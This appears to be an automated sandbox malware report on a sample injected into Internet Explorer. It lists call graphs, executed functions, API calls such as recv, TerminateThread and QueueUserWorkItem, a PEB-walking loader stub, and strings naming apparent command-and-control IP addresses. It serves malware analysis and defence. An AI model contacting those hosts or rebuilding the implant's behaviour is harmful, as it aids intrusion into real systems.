4b5bd55 46743 4b5e966 HeapDestroy 46704->46743 46709 4b5bdd5 46707->46709 46710 4b5bdbe 46707->46710 46708 4b5bcdd 46734 4b66123 73 API calls ~ctype 46708->46734 46767 4b58d83 66 API calls ~ctype 46709->46767 46754 4b5eb77 46710->46754 46714 4b5bce7 46716 4b5bceb 46714->46716 46736 4b66631 95 API calls _Maklocchr 46714->46736 46715 4b5bdc5 GetCurrentThreadId 46715->46692 46735 4b5eb3a 70 API calls ~ctype 46716->46735 46719 4b5bcf7 46720 4b5bd0b 46719->46720 46737 4b663bb 94 API calls 2 library calls 46719->46737 46720->46703 46739 4b66368 67 API calls ~ctype 46720->46739 46723 4b5bd00 46723->46720 46738 4b5b667 77 API calls 46723->46738 46810 4b5b95c 46725->46810 46728 4b51ac4 46728->46668 46728->46671 46729 4b51abb WaitForSingleObject 46729->46728 46730->46680 46731->46694 46732->46703 46733->46708 46734->46714 46735->46697 46736->46719 46737->46723 46738->46720 46739->46716 46740->46685 46741->46698 46742->46704 46743->46690 46744->46692 46746 4b5eafe RtlDecodePointer TlsSetValue 46745->46746 46747 4b5bd8d 46745->46747 46746->46747 46748 4b5c6e9 46747->46748 46751 4b5c6f2 46748->46751 46750 4b5bd99 46750->46692 46750->46699 46751->46750 46752 4b5c710 Sleep 46751->46752 46769 4b61f61 46751->46769 46753 4b5c725 46752->46753 46753->46750 46753->46751 46780 4b64030 46754->46780 46756 4b5eb83 GetModuleHandleW 46781 4b65d26 46756->46781 46758 4b5ebc1 InterlockedIncrement 46788 4b5ec19 46758->46788 46761 4b65d26 _Maklocchr 64 API calls 46762 4b5ebe2 46761->46762 46791 4b6025c InterlockedIncrement 46762->46791 46764 4b5ec00 46803 4b5ec22 46764->46803 46766 4b5ec0d _Maklocchr 46766->46715 46767->46692 46768->46692 46770 4b61f6d 46769->46770 46777 4b61f88 46769->46777 46771 4b61f79 46770->46771 46770->46777 46778 4b5c817 66 API calls ~ctype 46771->46778 46773 4b61f9b RtlAllocateHeap 46776 4b61fc2 46773->46776 46773->46777 46774 4b61f7e 46774->46751 46776->46751 46777->46773 46777->46776 46779 4b5e989 RtlDecodePointer 46777->46779 46778->46774 46779->46777 46780->46756 46782 4b65d4e RtlEnterCriticalSection 46781->46782 46783 4b65d3b 46781->46783 46782->46758 46806 4b65c64 66 API calls 3 library calls 46783->46806 46785 4b65d41 46785->46782 46807 4b5b879 66 API calls 2 library calls 46785->46807 46808 4b65c4d RtlLeaveCriticalSection 46788->46808 46790 4b5ebdb 46790->46761 46792 4b6027d 46791->46792 46793 4b6027a InterlockedIncrement 46791->46793 46794 4b60287 InterlockedIncrement 46792->46794 46795 4b6028a 46792->46795 46793->46792 46794->46795 46796 4b60297 46795->46796 46797 4b60294 InterlockedIncrement 46795->46797 46798 4b602a1 InterlockedIncrement 46796->46798 46800 4b602a4 46796->46800 46797->46796 46798->46800 46799 4b602bd InterlockedIncrement 46799->46800 46800->46799 46801 4b602d8 InterlockedIncrement 46800->46801 46802 4b602cd InterlockedIncrement 46800->46802 46801->46764 46802->46800 46809 4b65c4d RtlLeaveCriticalSection 46803->46809 46805 4b5ec29 46805->46766 46806->46785 46808->46790 46809->46805 46811 4b5b980 46810->46811 46812 4b5b96c 46810->46812 46813 4b5eae9 ~ctype 3 API calls 46811->46813 46836 4b5c817 66 API calls ~ctype 46812->46836 46815 4b5b986 46813->46815 46818 4b5c6e9 ~ctype 66 API calls 46815->46818 46816 4b5b971 46837 4b6071f 11 API calls std::bad_exception::bad_exception 46816->46837 46819 4b5b992 46818->46819 46820 4b5b9e3 46819->46820 46831 4b5eca4 46819->46831 46838 4b58d83 66 API calls ~ctype 46820->46838 46823 4b5b9e9 46828 4b51ab4 46823->46828 46839 4b5c83d 66 API calls ~ctype 46823->46839 46825 4b5eb77 ~ctype 66 API calls 46827 4b5b9a8 CreateThread 46825->46827 46827->46828 46830 4b5b9db GetLastError 46827->46830 46856 4b5b8f7 46827->46856 46828->46728 46828->46729 46830->46820 46840 4b5ec2b GetLastError 46831->46840 46833 4b5ecac 46834 4b5b99f 46833->46834 46854 4b5b879 66 API calls 2 library calls 46833->46854 46834->46825 46836->46816 46837->46828 46838->46823 46839->46828 46841 4b5eae9 ~ctype 3 API calls 46840->46841 46842 4b5ec42 46841->46842 46843 4b5ec98 SetLastError 46842->46843 46844 4b5c6e9 ~ctype 62 API calls 46842->46844 46843->46833 46845 4b5ec56 46844->46845 46845->46843 46846 4b5ec5e RtlDecodePointer 46845->46846 46847 4b5ec73 46846->46847 46848 4b5ec77 46847->46848 46849 4b5ec8f 46847->46849 46850 4b5eb77 ~ctype 62 API calls 46848->46850 46855 4b58d83 66 API calls ~ctype 46849->46855 46852 4b5ec7f GetCurrentThreadId 46850->46852 46852->46843 46853 4b5ec95 46853->46843 46855->46853 46857 4b5eae9 ~ctype 3 API calls 46856->46857 46858 4b5b902 46857->46858 46871 4b5eac9 TlsGetValue 46858->46871 46861 4b5b911 46916 4b5eb1d RtlDecodePointer 46861->46916 46862 4b5b93b 46873 4b5ecbe 46862->46873 46864 4b5b956 46909 4b5b8b6 46864->46909 46867 4b5b920 46869 4b5b924 GetLastError RtlExitUserThread 46867->46869 46870 4b5b931 GetCurrentThreadId 46867->46870 46868 4b5b95b 46869->46870 46870->46864 46872 4b5b90d 46871->46872 46872->46861 46872->46862 46875 4b5ecca _Maklocchr 46873->46875 46874 4b5ece2 46878 4b5ecf0 46874->46878 46918 4b58d83 66 API calls ~ctype 46874->46918 46875->46874 46876 4b5edcc _Maklocchr 46875->46876 46917 4b58d83 66 API calls ~ctype 46875->46917 46876->46864 46880 4b5ecfe 46878->46880 46919 4b58d83 66 API calls ~ctype 46878->46919 46882 4b5ed0c 46880->46882 46920 4b58d83 66 API calls ~ctype 46880->46920 46884 4b5ed1a 46882->46884 46921 4b58d83 66 API calls ~ctype 46882->46921 46886 4b5ed28 46884->46886 46922 4b58d83 66 API calls ~ctype 46884->46922 46888 4b5ed36 46886->46888 46923 4b58d83 66 API calls ~ctype 46886->46923 46890 4b5ed47 46888->46890 46924 4b58d83 66 API calls ~ctype 46888->46924 46892 4b65d26 _Maklocchr 66 API calls 46890->46892 46893 4b5ed4f 46892->46893 46894 4b5ed74 46893->46894 46895 4b5ed5b InterlockedDecrement 46893->46895 46926 4b5edd8 RtlLeaveCriticalSection _Maklocchr 46894->46926 46895->46894 46896 4b5ed66 46895->46896 46896->46894 46925 4b58d83 66 API calls ~ctype 46896->46925 46898 4b5ed81 46899 4b65d26 _Maklocchr 66 API calls 46898->46899 46901 4b5ed88 46899->46901 46902 4b5edb9 46901->46902 46927 4b602eb 8 API calls 46901->46927 46929 4b5ede4 RtlLeaveCriticalSection _Maklocchr 46902->46929 46905 4b5edc6 46930 4b58d83 66 API calls ~ctype 46905->46930 46907 4b5ed9d 46907->46902 46928 4b60384 66 API calls 2 library calls 46907->46928 46910 4b5b8c2 _Maklocchr 46909->46910 46911 4b5eca4 _Maklocchr 66 API calls 46910->46911 46912 4b5b8c7 46911->46912 46931 4b4d64e 46912->46931 46936 4b5199b 46912->46936 46913 4b5b8d1 46916->46867 46917->46874 46918->46878 46919->46880 46920->46882 46921->46884 46922->46886 46923->46888 46924->46890 46925->46894 46926->46898 46927->46907 46928->46902 46929->46905 46930->46876 46960 4b45901 46931->46960 46934 4b4d66e 46934->46913 46937 4b519b0 46936->46937 46937->46937 46938 4b519bf CreateMutexW GetLastError 46937->46938 46939 4b519df 46938->46939 46940 4b519d9 46938->46940 47018 4b51943 WSAStartup 46939->47018 47015 4b5b83e 46940->47015 46947 4b51a90 46947->46913 46950 4b4c391 78 API calls 46951 4b51a0a 46950->46951 46952 4b4c391 78 API calls 46951->46952 46953 4b51a30 46952->46953 47071 4b4d54b 77 API calls 46953->47071 46955 4b51a37 46956 4b4c391 78 API calls 46955->46956 46957 4b51a62 46956->46957 46958 4b4d64e 295 API calls 46957->46958 46959 4b519e8 Mailbox 46958->46959 47072 4b58e89 46959->47072 46961 4b45912 WaitForSingleObject 46960->46961 46962 4b4590d 46960->46962 46961->46962 46962->46934 46963 4b458cc 46962->46963 46964 4b458d7 46963->46964 46965 4b458db CreateThread 46963->46965 46964->46934 46965->46964 46966 4b4d58d 46965->46966 46969 4b4ce76 46966->46969 46968 4b4d598 46970 4b4c609 LoadLibraryW GetProcAddress GetProcAddress FreeLibrary 46969->46970 46981 4b4ceb3 Mailbox 46970->46981 46971 4b4ce23 68 API calls 46971->46981 46972 4b4b277 77 API calls 46972->46981 46973 4b4c65a 222 API calls 46973->46981 46974 4b4b252 77 API calls 46974->46981 46975 4b46275 79 API calls 46975->46981 46976 4b4a828 112 API calls 46978 4b4cf4a Sleep 46976->46978 46977 4b4c62e 76 API calls 46977->46981 46982 4b4aeb7 67 API calls 46978->46982 46979 4b4afbf 77 API calls 46979->46981 46980 4b51187 GetExitCodeProcess 46980->46981 46981->46971 46981->46972 46981->46973 46981->46974 46981->46975 46981->46976 46981->46977 46981->46979 46981->46980 46983 4b4d33f Sleep 46981->46983 46984 4b4d01e 46981->46984 46987 4b4d004 Sleep 46981->46987 46988 4b5023f 9 API calls 46981->46988 46990 4b4d376 GetTickCount 46981->46990 46991 4b4580f 116 API calls 46981->46991 46993 4b4aeb7 67 API calls 46981->46993 46995 4b4d125 Sleep 46981->46995 46996 4b5076e TerminateThread CloseHandle CloseHandle CloseHandle 46981->46996 46999 4b58dbd 77 API calls 46981->46999 47000 4b4a828 112 API calls 46981->47000 47004 4b4a828 112 API calls 46981->47004 47005 4b58d83 66 API calls ~ctype 46981->47005 47008 4b4d303 Sleep 46981->47008 46982->46981 46985 4b4aeb7 67 API calls 46983->46985 46984->46981 46986 4b4c389 19 API calls 46984->46986 46989 4b4d4d7 Sleep 46984->46989 46994 4b594a0 66 API calls 46984->46994 46997 4b4c62e 76 API calls 46984->46997 47001 4b4c62e 76 API calls 46984->47001 47003 4b51b99 closesocket TerminateThread 46984->47003 47007 4b4c62e 76 API calls 46984->47007 47010 4b50a1b closesocket closesocket closesocket closesocket TerminateThread 46984->47010 47011 4b4c62e 76 API calls 46984->47011 47012 4b4c62e 76 API calls 46984->47012 47014 4b55730 87 API calls 46984->47014 46985->46984 46986->46981 46987->46981 46987->46984 46988->46981 46989->46981 46992 4b5948e 66 API calls 46990->46992 46991->46981 46992->46984 46993->46981 46994->46984 46995->46981 46995->46984 46996->46981 46998 4b4d222 TerminateThread 46997->46998 46998->46981 46999->46981 47000->46981 47002 4b4d291 TerminateThread 47001->47002 47002->46981 47003->46984 47006 4b4d453 QueueUserWorkItem 47004->47006 47005->46981 47006->46981 47009 4b4d2b6 TerminateThread 47007->47009 47008->46981 47009->46981 47010->46984 47011->46984 47013 4b4d2de TerminateThread 47012->47013 47013->46981 47014->47008 47080 4b5b6fe 66 API calls 2 library calls 47015->47080 47017 4b5b84f 47017->46939 47019 4b5196c 47018->47019 47021 4b51982 47018->47021 47020 4b51987 WSACleanup 47019->47020 47019->47021 47020->47021 47022 4b58e89 ctype 5 API calls 47021->47022 47023 4b51999 47022->47023 47023->46959 47024 4b4c391 47023->47024 47025 4b4c3a0 47024->47025 47026 4b4c3b8 47024->47026 47081 4b4d599 78 API calls 47025->47081 47030 4b4d673 47026->47030 47028 4b4c3ae 47082 4b5ace5 76 API calls 47028->47082 47031 4b4e5c0 47030->47031 47032 4b4d6aa GetTickCount 47031->47032 47083 4b5948e 47032->47083 47036 4b4d6f9 47037 4b4d774 47036->47037 47038 4b4d715 47036->47038 47040 4b58dbd 77 API calls 47037->47040 47041 4b4d734 47038->47041 47045 4b4d74f 47038->47045 47046 4b4d71b 47038->47046 47039 4b594a0 66 API calls 47042 4b4d6ca 47039->47042 47044 4b4d77b 47040->47044 47043 4b58dbd 77 API calls 47041->47043 47042->47036 47042->47039 47096 4b4d4df 77 API calls 47042->47096 47049 4b4d740 47043->47049 47048 4b4d780 47044->47048 47044->47049 47050 4b58dbd 77 API calls 47045->47050 47051 4b4d78f CreateEventW 47046->47051 47097 4b58dbd 47046->47097 47110 4b57652 67 API calls 47048->47110 47049->47051 47050->47049 47111 4b42e58 CloseHandle 47051->47111 47056 4b4d7a3 47070 4b4d7b1 Mailbox 47056->47070 47089 4b4c62e 47056->47089 47057 4b4d788 47057->47049 47058 4b4d72a 47109 4b57652 67 API calls 47058->47109 47060 4b58e89 ctype 5 API calls 47063 4b4d801 47060->47063 47061 4b4d732 47061->47041 47063->46950 47063->46959 47067 4b4c62e 76 API calls 47068 4b4d7d5 47067->47068 47112 4b54b2a 132 API calls 47068->47112 47070->47060 47071->46955 47073 4b58e91 47072->47073 47074 4b58e93 IsDebuggerPresent 47072->47074 47073->46947 47138 4b69cc7 47074->47138 47077 4b5ea7e SetUnhandledExceptionFilter UnhandledExceptionFilter 47078 4b5eaa3 GetCurrentProcess TerminateProcess 47077->47078 47079 4b5ea9b ctype 47077->47079 47078->46947 47079->47078 47080->47017 47081->47028 47082->47026 47084 4b5eca4 _Maklocchr 66 API calls 47083->47084 47085 4b4d6c4 47084->47085 47086 4b594a0 47085->47086 47087 4b5eca4 _Maklocchr 66 API calls 47086->47087 47088 4b594a5 47087->47088 47088->47042 47090 4b4c655 47089->47090 47091 4b4c63d 47089->47091 47093 4b51e1b 47090->47093 47113 4b5ace5 76 API calls 47091->47113 47114 4b51b4a 47093->47114 47096->47042 47099 4b58dc7 47097->47099 47100 4b4d725 47099->47100 47105 4b58de3 47099->47105 47117 4b593fa 47099->47117 47134 4b5e989 RtlDecodePointer 47099->47134 47100->47041 47100->47058 47102 4b58e21 47136 4b58cbe 66 API calls std::bad_exception::bad_exception 47102->47136 47104 4b58e2b 47137 4b58e3d RaiseException 47104->47137 47105->47102 47135 4b5ace5 76 API calls 47105->47135 47108 4b58e3c 47109->47061 47110->47057 47111->47056 47112->47070 47113->47090 47115 4b51af8 6 API calls 47114->47115 47116 4b4d7c8 47115->47116 47116->47067 47116->47070 47118 4b59477 47117->47118 47127 4b59408 47117->47127 47119 4b5e989 std::bad_exception::bad_exception RtlDecodePointer 47118->47119 47121 4b5947d 47119->47121 47120 4b59413 47122 4b5f34b std::bad_exception::bad_exception 65 API calls 47120->47122 47126 4b5f19c std::bad_exception::bad_exception 65 API calls 47120->47126 47120->47127 47130 4b5b5e6 std::bad_exception::bad_exception GetModuleHandleW GetProcAddress ExitProcess 47120->47130 47123 4b5c817 ~ctype 65 API calls 47121->47123 47122->47120 47125 4b5946f 47123->47125 47124 4b59436 RtlAllocateHeap 47124->47125 47124->47127 47125->47099 47126->47120 47127->47120 47127->47124 47128 4b59463 47127->47128 47131 4b5e989 std::bad_exception::bad_exception RtlDecodePointer 47127->47131 47132 4b59461 47127->47132 47129 4b5c817 ~ctype 65 API calls 47128->47129 47129->47132 47130->47120 47131->47127 47133 4b5c817 ~ctype 65 API calls 47132->47133 47133->47125 47134->47099 47135->47102 47136->47104 47137->47108 47138->47077 47139 300069b 47140 3000c1b 47139->47140 47142 4b5beee 379 API calls 47140->47142 47141 3000c44 47142->47141

      Executed Functions

      Function 03000019 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 673COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 571 3000019-3000029 572 300003a-3000044 571->572 573 30000d0-3000103 GetPEB 572->573 574 300004a-300005f 572->574 575 3000105-3000114 573->575 576 3000061-3000077 574->576 577 30000cb 574->577 575->575 579 3000116-300011f 575->579 576->577 580 3000079-300008e 576->580 577->572 579->575 581 3000121-3000471 579->581 580->577 582 3000090-30000a6 580->582 591 3000473 581->591 592 3000478-300048c 581->592 582->577 583 30000a8-30000c9 582->583 583->573 593 3000c83-3000c89 591->593 594 3000493-30004a2 592->594 595 300048e 592->595 596 30004a4 594->596 597 30004a9-30004c1 594->597 595->593 596->593 598 30004c3 597->598 599 30004c8-30004d5 597->599 598->593 600 30004d7 599->600 601 30004dc-30004e6 599->601 600->593 602 30004e8 601->602 603 30004ed-30004fa 601->603 602->593 604 3000501-3000516 603->604 605 30004fc 603->605 606 3000527-3000534 604->606 605->593 607 3000562-300056d 606->607 608 3000536-3000559 606->608 611 3000574-30005a0 607->611 612 300056f 607->612 609 3000560 608->609 610 300055b 608->610 609->606 610->593 614 30005b1-30005be 611->614 612->593 615 30005c4-30005fc 614->615 616 3000669-300066d 614->616 619 300060c-3000612 615->619 620 30005fe-300060a 615->620 617 3000674-3000694 616->617 618 300066f 616->618 626 30006a0-30006f0 617->626 627 3000696 617->627 618->593 621 3000618-3000659 619->621 620->621 623 3000664 621->623 624 300065b-3000661 621->624 623->614 624->623 628 3000701-300070d 626->628 627->593 629 300072d-3000737 628->629 630 300070f-300072b 628->630 632 3000748-3000755 629->632 630->628 633 3000806-3000834 632->633 634 300075b-300076c 632->634 635 3000983-30009af 633->635 636 300083a-3000844 633->636 637 3000781 634->637 638 300076e-300077f 634->638 640 30009b1 635->640 641 30009bb-30009c7 635->641 636->635 642 300084a-3000865 636->642 639 3000739-3000742 637->639 638->637 643 3000783-30007a9 638->643 639->632 640->641 645 30009cd-30009d6 641->645 646 300086b-300087c 642->646 644 30007ba-30007d0 643->644 647 3000801 644->647 648 30007d2-30007ff 644->648 649 3000bd8-3000be9 645->649 650 30009dc-3000a2e 645->650 646->635 651 3000882-30008af 646->651 647->639 648->644 653 3000c01-3000c41 call 4b5beee 649->653 654 3000beb-3000bfc 649->654 655 3000a3f-3000a49 650->655 656 30008c0-30008cc 651->656 674 3000c44-3000c51 653->674 654->593 657 3000a4b-3000a5c 655->657 658 3000a7d-3000a87 655->658 659 30008d2-30008ee 656->659 660 3000969-300097e 656->660 663 3000a60-3000a7b 657->663 664 3000a5e 657->664 665 3000a95-3000a9b 658->665 666 3000a89-3000a93 658->666 667 30008f0 659->667 668 30008f2-300090e 659->668 660->646 663->655 664->658 670 3000aa3-3000aba 665->670 666->670 671 3000964 667->671 668->671 672 3000910-3000962 668->672 678 3000abc-3000ad3 LoadLibraryA 670->678 679 3000adf-3000ae9 670->679 671->656 672->671 676 3000c53-3000c79 674->676 677 3000c7b 674->677 676->593 677->593 678->679 680 3000ad5 678->680 681 3000afa-3000b0a 679->681 680->679 683 3000b11-3000b30 681->683 684 3000b0c-3000bd3 681->684 687 3000b32-3000b5b 683->687 688 3000b5d-3000b8f 683->688 684->645 691 3000b95-3000b9c 687->691 688->691 692 3000bb5 691->692 693 3000b9e-3000bb3 691->693 694 3000bbf 692->694 693->694 694->681
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: GetP$rocA
      • API String ID: 0-699337948
      • Opcode ID: bddaf1d6c04482fb7e6e334e95170fc2cb22990af294f9a72044e07683721cef
      • Instruction ID: a9e59fde95dd183e9af08fffbce9d2377712290c1d5c534921b105e59458b5ba
      • Opcode Fuzzy Hash: bddaf1d6c04482fb7e6e334e95170fc2cb22990af294f9a72044e07683721cef
      • Instruction Fuzzy Hash: 7582F370E09268CFEB65CB18C898BEDBBB2AF4A304F0481D9D4896B381C7755E94CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B43A47 Relevance: 1.5, APIs: 1, Instructions: 40networkCOMMON
      Download Yara Rule
      APIs
      • recv.WS2_32(?,?,?,00000000), ref: 04B43A81
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: recv
      • String ID:
      • API String ID: 1507349165-0
      • Opcode ID: 57ce3cbf28754c8469ded03f7e26a795b4c447aa47246455f957f2737c1c22a5
      • Instruction ID: d204ca2ab5466024dcb116c656fda48bb1683559354a6d82d2f55f0bc4874f43
      • Opcode Fuzzy Hash: 57ce3cbf28754c8469ded03f7e26a795b4c447aa47246455f957f2737c1c22a5
      • Instruction Fuzzy Hash: 86F090323442147BDB048969DC81EAE3BEDEBC9770F24466AF915C61D0E2B1AD41A7A0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4CE76 Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 424sleepthreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 4b4ce76-4b4cee9 call 4b4c609 3 4b4ceef-4b4cf06 call 4b4ce23 0->3 6 4b4cf5d-4b4cf64 3->6 7 4b4cf08-4b4cf1a call 4b4b277 3->7 9 4b4cf66 6->9 10 4b4cf6c-4b4cf72 6->10 17 4b4cf1c 7->17 18 4b4cf1e-4b4cf58 call 4b4b252 call 4b4a001 call 4b4a828 Sleep call 4b4aeb7 7->18 9->10 11 4b4d175-4b4d1a7 call 4b4c65a 10->11 12 4b4cf78-4b4cf80 10->12 25 4b4d1a9-4b4d1b5 call 4b58d83 11->25 26 4b4d1bb-4b4d1c7 11->26 14 4b4cfa0 12->14 15 4b4cf82-4b4cf83 12->15 22 4b4cfaa-4b4cfb1 14->22 19 4b4cf94-4b4cf9e 15->19 20 4b4cf85-4b4cf86 15->20 17->18 18->6 19->22 20->14 24 4b4cf88-4b4cf92 20->24 27 4b4d024-4b4d02b 22->27 28 4b4cfb3-4b4cfb9 22->28 24->22 25->26 35 4b4d1cd-4b4d1da 26->35 36 4b4d319-4b4d33d call 4b4b277 call 4b4afbf 26->36 30 4b4d031-4b4d039 27->30 31 4b4d14f-4b4d157 27->31 33 4b4cfbc-4b4cfc1 28->33 39 4b4d060-4b4d07a 30->39 40 4b4d03b-4b4d03c 30->40 37 4b4d162-4b4d16f 31->37 38 4b4d159-4b4d15c 31->38 33->33 42 4b4cfc3-4b4cfdc call 4b46275 33->42 45 4b4d1e2-4b4d1f2 call 4b4c62e call 4b51187 35->45 46 4b4d1dc 35->46 75 4b4d354-4b4d363 call 4b4a013 36->75 76 4b4d33f-4b4d34f Sleep call 4b4aeb7 36->76 37->11 38->12 38->37 49 4b4d07c-4b4d07d 39->49 50 4b4d0a9 39->50 47 4b4d232-4b4d24e 40->47 48 4b4d042-4b4d05e 40->48 68 4b4cfe0-4b4cffe call 4b4580f call 4b4211c 42->68 69 4b4cfde 42->69 79 4b4d1f4-4b4d1f6 call 4b4c389 45->79 80 4b4d1fb-4b4d20d call 4b4c62e call 4b5023f 45->80 46->45 47->37 56 4b4d0c8-4b4d0ce 48->56 57 4b4d09d-4b4d0a7 49->57 58 4b4d07f-4b4d080 49->58 55 4b4d0b3-4b4d0c0 50->55 64 4b4d0d4-4b4d0da 55->64 65 4b4d0c2 55->65 56->37 56->64 57->55 66 4b4d091-4b4d09b 58->66 67 4b4d082-4b4d083 58->67 73 4b4d0dd-4b4d0e2 64->73 65->56 66->55 67->50 74 4b4d085-4b4d08f 67->74 95 4b4d004-4b4d01c Sleep 68->95 96 4b4d253-4b4d25f 68->96 69->68 73->73 82 4b4d0e4-4b4d0fd call 4b46275 73->82 74->55 91 4b4d365-4b4d367 75->91 92 4b4d36d-4b4d370 75->92 76->3 79->80 111 4b4d264 80->111 112 4b4d20f-4b4d21a call 4b4c62e 80->112 101 4b4d101-4b4d11f call 4b4580f call 4b4211c 82->101 102 4b4d0ff 82->102 91->92 97 4b4d4d5 91->97 98 4b4d372-4b4d374 92->98 99 4b4d3cb-4b4d3f7 call 4b4c62e call 4b5511d 92->99 95->27 103 4b4d01e 95->103 96->11 104 4b4d4d7-4b4d4dd Sleep 97->104 98->99 105 4b4d376-4b4d389 GetTickCount call 4b5948e 98->105 99->97 133 4b4d3fd-4b4d404 99->133 101->96 134 4b4d125-4b4d13d Sleep 101->134 102->101 103->27 109 4b4d4c6-4b4d4d0 call 4b4aeb7 104->109 123 4b4d3c3-4b4d3c9 call 4b594a0 105->123 124 4b4d38b-4b4d38c 105->124 109->3 115 4b4d26a-4b4d27c call 4b4c62e call 4b5076e 111->115 112->111 132 4b4d21c-4b4d230 call 4b4c62e TerminateThread 112->132 152 4b4d27e-4b4d289 call 4b4c62e 115->152 153 4b4d299-4b4d2a4 call 4b4c62e 115->153 146 4b4d3a8-4b4d3ab 123->146 130 4b4d38e-4b4d390 124->130 131 4b4d3bb-4b4d3c1 call 4b594a0 124->131 139 4b4d392-4b4d394 130->139 140 4b4d399-4b4d3a6 call 4b594a0 130->140 151 4b4d3ad 131->151 132->115 133->97 142 4b4d40a-4b4d414 call 4b4a019 133->142 134->31 135 4b4d13f-4b4d149 134->135 135->31 139->104 140->146 140->151 155 4b4d416-4b4d420 call 4b58dbd 142->155 156 4b4d469-4b4d4aa call 4b4a828 142->156 150 4b4d3b2-4b4d3b6 146->150 150->104 151->150 152->153 166 4b4d28b-4b4d297 call 4b4c62e TerminateThread 152->166 163 4b4d2a6-4b4d2bc call 4b4c62e call 4b51b99 call 4b4c62e TerminateThread 153->163 164 4b4d2be-4b4d2c9 call 4b4c62e 153->164 169 4b4d422-4b4d42c 155->169 170 4b4d42e 155->170 182 4b4d4ac-4b4d4be call 4b58d83 156->182 183 4b4d4bf 156->183 163->164 180 4b4d2e6-4b4d2f1 call 4b4c62e 164->180 181 4b4d2cb-4b4d2e4 call 4b4c62e call 4b50a1b call 4b4c62e TerminateThread 164->181 166->153 174 4b4d430-4b4d467 call 4b4a828 QueueUserWorkItem 169->174 170->174 174->109 193 4b4d303-4b4d314 Sleep 180->193 194 4b4d2f3-4b4d2fe call 4b4c62e call 4b55730 180->194 181->180 182->183 183->109 193->3 194->193
      APIs
        • Part of subcall function 04B4CE23: RtlEnterCriticalSection.NTDLL(?), ref: 04B4CE34
        • Part of subcall function 04B4CE23: RtlLeaveCriticalSection.NTDLL(?), ref: 04B4CE67
      • Sleep.KERNELBASE(00000005,?,00000017,00000000,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4CF4C
      • Sleep.KERNEL32(00001388,00000001,00000000), ref: 04B4D009
      • Sleep.KERNEL32(000001F4,00000001,00000000), ref: 04B4D12A
      • TerminateThread.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4D22E
      • TerminateThread.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4D297
      • TerminateThread.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4D2BC
      • TerminateThread.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 04B4D2E4
      • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 04B4D308
      • Sleep.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 04B4D341
      • GetTickCount.KERNEL32 ref: 04B4D376
      • QueueUserWorkItem.KERNEL32(04B4C9C3,00000000,00000000,00000010,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 04B4D45B
      • Sleep.KERNEL32(00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 04B4D4D7
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Sleep$TerminateThread$CriticalSection$CountEnterItemLeaveQueueTickUserWork
      • String ID: 144.168.45.116$67.205.132.17$67.205.132.17
      • API String ID: 1028147-1276932278
      • Opcode ID: 84eb4837bb81f77136d8fa4897200cf883bd7cf91c6482f36ee9b7f37cd739fc
      • Instruction ID: b55304e879a66d6c07351d6bc898d5b37004e016864867798aa70c0eb228bf0e
      • Opcode Fuzzy Hash: 84eb4837bb81f77136d8fa4897200cf883bd7cf91c6482f36ee9b7f37cd739fc
      • Instruction Fuzzy Hash: 60025171901319DFEF24AF64DC94BA9B7B9FB84305F0041EAD509A7250DB34BA84EF21
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B498BB Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 529COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 203 4b498bb-4b498f2 call 4b42a8c 206 4b498f4-4b498fe 203->206 207 4b49903-4b4991e call 4b451a6 203->207 208 4b49fe3-4b49fee call 4b4250c 206->208 213 4b49924-4b4993c 207->213 214 4b49a38 207->214 217 4b49ff0-4b49ffe call 4b58e89 208->217 215 4b49944-4b49974 call 4b46021 call 4b46f3e 213->215 216 4b4993e 213->216 219 4b49a3f-4b49a45 214->219 229 4b49fd1-4b49fde call 4b4211c 215->229 230 4b4997a-4b49986 call 4b42a65 215->230 216->215 222 4b49a47-4b49a49 call 4b46bb0 219->222 223 4b49a4e-4b49b01 call 4b59380 * 3 219->223 222->223 247 4b49b05-4b49b17 223->247 248 4b49b03 223->248 229->208 237 4b49998-4b4999b 230->237 238 4b49988-4b49992 call 4b46904 230->238 237->219 241 4b499a1-4b499ab 237->241 238->237 245 4b499ad 241->245 246 4b499af-4b499b3 241->246 245->246 249 4b499ba-4b499bf 246->249 252 4b499cd 247->252 253 4b49b1d-4b49b54 call 4b42a65 call 4b59be0 call 4b5948e call 4b594a0 call 4b467c7 247->253 248->247 249->219 250 4b499c1-4b499c7 GetLastError 249->250 250->252 254 4b499d3-4b499df 252->254 277 4b49c15-4b49c21 lstrcpyW 253->277 278 4b49b5a 253->278 256 4b499e7-4b499e9 254->256 257 4b499e1 254->257 259 4b499f2-4b499f8 256->259 